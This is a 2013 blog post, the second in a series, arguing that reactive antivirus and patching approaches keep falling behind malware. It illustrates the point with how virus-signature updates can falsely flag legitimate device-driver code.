Platt Perspective on Business and Technology

Information systems security and the ongoing consequences of always being reactive – 2

Posted in business and convergent technologies by Timothy Platt on February 12, 2013

This is my second installment to a series on the state of information systems security going into the second decade of the 21st century, and on challenges that will have to be addressed in moving forward from where we are now (see Part 1 where I focused on the limitations of purely reactive approaches to meeting the challenge of malware and its evolution and distribution, there citing antivirus and related security software as a source of working examples.)

I continue the general discussion of Part 1 by turning an observation I arrived at there, towards its end, into a question and a challenge here:

• When the basic thrust of software and computer systems security is reactive, and when the pace of development of new threat forms is steadily increasing and even accelerating in that change, and when even the best reactive responses are continuing to fall further and further behind, what should computer systems and information security responders do, if their protective efforts are to offer any real value?

One response, obviously, is to reduce the response time-lag between when a new vulnerability is first identified by software producers or anti-malware service providers, and when they start sending out corrective responses. For software producers this means sending out patches and other updates to their products sooner and even as soon as those fixes can be developed instead of waiting on that until they can send out a collection of updates as a bundle. Microsoft, as a famous and even notorious case in point used to hold off on patch and corrective update releases for most of the software fixes they sent out until the second Tuesday of each month: their standardized Patch Tuesday scheduled release dates. And this meant that some of their updates were going out right away – if they happened to be completed and in-house vetted right before that second Tuesday. But many and even most of their patches and fixes were intentionally delayed for release and even for as long as most of a month.

Focusing here on antivirus software development:

• Speeding up the study of a new piece of malware, the identification of a proper code snippet for use as a virus definition for blocking it, and testing that antivirus definition fix would have to be speeded up in a similar way and at least at as rapid a rate as that of malware development and advance to just keep reactive protective approaches from falling further behind.
• It is important to note in that context that with the increased numbers of viruses and other malware being produced and launched, and the increasing rate of its development and release this becomes an increasingly difficult challenge.
• And with the ever-increasing scale and complexity of the software that has to be protected, the risk that any given antivirus identification snippet also occurs in the software that this should be protecting increases too.
• Antivirus software is not for the most part written to safeguard one specific software package from compromise. It is written and distributed to protect entire computer systems with all of the operating system and other software installed, and without harming functionality of anything that should be in place while identifying and blocking what it finds to be malware.
• So antivirus software updates have to be tested against a progressively more complex and diverse set of benchmark software-installed test computers to make sure that a fix does not cause harm in and of itself while identifying and blocking those new viruses too.

And here I note that if you look at the fundamental operations that computer viruses and other malware carry out, every one of them is also legitimately and even essentially carried out by user-intended software too, and for legitimate and constructive purposes. The problem created by malware is not in the individual functional steps it performs but in the pattern of potentially valid ones it carries through upon and the end goals achieved as a result.

To take that out of the abstract I will cite an example that involves some of the most fundamental activity that legitimate software can carry out and that is also fundamental to making malware work too. And I begin with a computer’s basic input/output systems. These systems manage communication between the computer and its internal hardware and software, and the outside world and through mice and keyboards, USB ports and other input sources and through monitors and speakers and output channels such as those same USB ports as you can both download from them and upload to them.

These functions are so fundamental that when relevant operating system software is loaded into memory upon booting up a computer to make it functional, this is usually loaded in first and at the lowest number memory addresses – the functionally shortest memory addresses and fastest processed. This volatile storage space is sometimes referred to as page one of memory and essentially every legitimate software package accesses and utilizes it. Many legitimate software programs and apps legitimately make changes to this too, at least for select portions of what is held in page one of memory. As an example, consider device drivers that would be used for example to functionally enable and provide access to peripherals such as the monitor or keyboard, or a CD or DVD player or flash drive.

Now imagine a new anti-malware code snippet definition included in an antivirus update file, that also identifies a similar snippet of code that happens to be in a legitimate device driver. The more complex the range and diversity of legitimate code out there that has to be protected, the more difficult it is to select virus code snippets that are distinct from it. So an antivirus update could conceivably block a new virus but at the same time take out some specific brand of game player input device for a group of antivirus support customers – who happen to be using their computers largely to play their online multi-player games.

I write this as a perhaps extreme example where an inopportune virus definition update completely knocks out something that is both desirable on that computer and fundamentally essential to the computer’s user. Though even there, with the thousands and even tens of thousands of device driver apps out there, and certainly when multiple generational versions are all in use for many of them, this is a genuine potential collateral damage target when seeking to block malware. When the hundreds of millions of lines of legitimate software code that reside on computers is considered and concern is for not blocking partial functionality and degrading legitimate performance this becomes a larger and more complex issue. As a due diligence concern, these possibilities have to be taken into account when producing and vetting any anti-malware software update. And as noted above, this becomes at least an incrementally bigger challenge every single day.

• So simply accepting a reactive response paradigm and seeking to improve on the reaction time cannot suffice, and certainly not long-term.
• I am going to turn in my next series installment to consider more proactive approaches and breaking away from this reactive paradigm.

Meanwhile, you can find this and related postings at Ubiquitous Computing and Communications – everywhere all the time.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: